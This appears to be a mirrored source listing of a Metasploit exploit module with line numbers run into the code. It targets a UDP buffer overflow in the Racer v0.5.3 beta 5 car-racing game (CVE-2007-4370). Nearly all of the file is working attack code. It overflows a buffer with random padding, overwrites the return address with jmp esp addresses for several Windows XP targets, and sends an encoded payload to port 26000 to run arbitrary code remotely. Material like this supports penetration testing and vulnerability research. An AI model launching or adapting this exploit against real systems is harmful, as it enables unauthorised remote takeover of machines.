Path: blob/master/modules/exploits/windows/games/racer_503beta5.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Racer v0.5.3 Beta 5 Buffer Overflow',15'Description' => %q{16This module exploits the Racer Car and Racing Simulator game17versions v0.5.3 beta 5 and earlier. Both the client and server listen18on UDP port 26000. By sending an overly long buffer we are able to19execute arbitrary code remotely.20},21'Author' => [ 'Trancek <trancek[at]yashira.org>' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2007-4370' ],25[ 'OSVDB', '39601' ],26[ 'EDB', '4283' ],27[ 'BID', '25297' ],28],29'Payload' => {30'Space' => 1000,31'BadChars' => "\x5c\x00",32'EncoderType' => Msf::Encoder::Type::AlphanumUpper,33},34'DefaultOptions' => {35'AllowWin32SEH' => true36},37'Platform' => 'win',38'Targets' => [39# Tested ok aushack 2009050340[ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp41[ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],42[ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],43],44'DisclosureDate' => '2008-08-10',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56Opt::RPORT(26000)57]58)59end6061def exploit62connect_udp6364buf = Rex::Text.rand_text_alphanumeric(1001)65buf << [target.ret].pack('V')66buf << payload.encoded67buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)6869udp_sock.put(buf)7071handler72disconnect_udp73end74end757677